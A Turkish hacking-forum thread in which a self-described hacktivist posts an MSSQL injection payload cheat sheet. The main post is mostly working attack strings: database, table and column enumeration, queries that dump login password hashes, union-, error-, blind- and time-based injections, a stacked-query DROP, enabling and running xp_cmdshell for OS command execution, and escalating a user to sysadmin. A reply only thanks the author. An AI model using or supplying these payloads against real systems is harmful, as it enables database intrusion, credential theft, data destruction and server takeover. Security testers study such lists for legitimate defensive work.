Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: MsSQL Enjeksiyon Payload Örnekleri
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,378 / 1,378
Deneyim: 13 / 100
Rep Sayısı: 2791
Mesaj Sayısı: 6399
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
MsSQL Enjeksiyon Payload Örnekleri
10.02.2019 14:35
MsSQL Enjeksiyon Payload Örnekleri
********************************

Author => KingSkrupellos
Team => Cyberizm Digital Security Team

# MSSQL Injection

## MSSQL comments

Kod:
```sql
-- comment goes here
/* comment goes here */
```

## MSSQL version

Kod:
```sql
SELECT @@version
```

## MSSQL database name

Kod:
```sql
SELECT DB_NAME()
```

## MSSQL List Databases[/code]

Kod:
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
```

## MSSQL List Column

Kod:
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, column_name FROM information_schema.columns
```

## MSSQL List Tables

Kod:
```sql
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

SELECT table_catalog, table_name FROM information_schema.columns
```

## MSSQL User Password

Kod:
```sql
MSSQL 2000:

SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)

MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```

## MSSQL Union Based

Kod:
```sql
-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from Injection database

Kod:
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users

Kod:
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- Finally extract the data

Kod:
$ SELECT  UserId, UserName from Users
```

## MSSQL Error based

Kod:
```sql
For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)

For string inputs   : ' + convert(int,@@version) + '
For string inputs   : ' + cast((SELECT @@version) as int) + '
```

## MSSQL Blind based

Kod:
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```

## MSSQL Time based

Kod:
```sql
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'                              comment:   --
```

## MSSQL Stacked Query

Kod:
Use a semi-colon ";" to add another query

```sql
ProductID=1; DROP members--
```

## MSSQL Command execution

Kod:
```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```

If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)

Kod:
```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```

## MSSQL Make user DBA (DB admin)

Kod:
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
_________________________________________________________

##### THE END #######

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
#Ayar
*
avatar
Tabutçu
Durum: Çevrimdışı
Seviye Puanı: 35
Yaşam Puanı: 791 / 869
Deneyim: 78 / 100
Rep Sayısı: 1534
Mesaj Sayısı: 1838
Üyelik Tarihi: 13.08.2013
      
Yorum: #2
RE: MsSQL Enjeksiyon Payload Örnekleri
11.02.2019 11:42
Teşekkürler, Emeğine Sağlık Smile

Başka forumlarda üyeliğim bulunmamaktadır.
ayar
Alinti



1 Ziyaretçi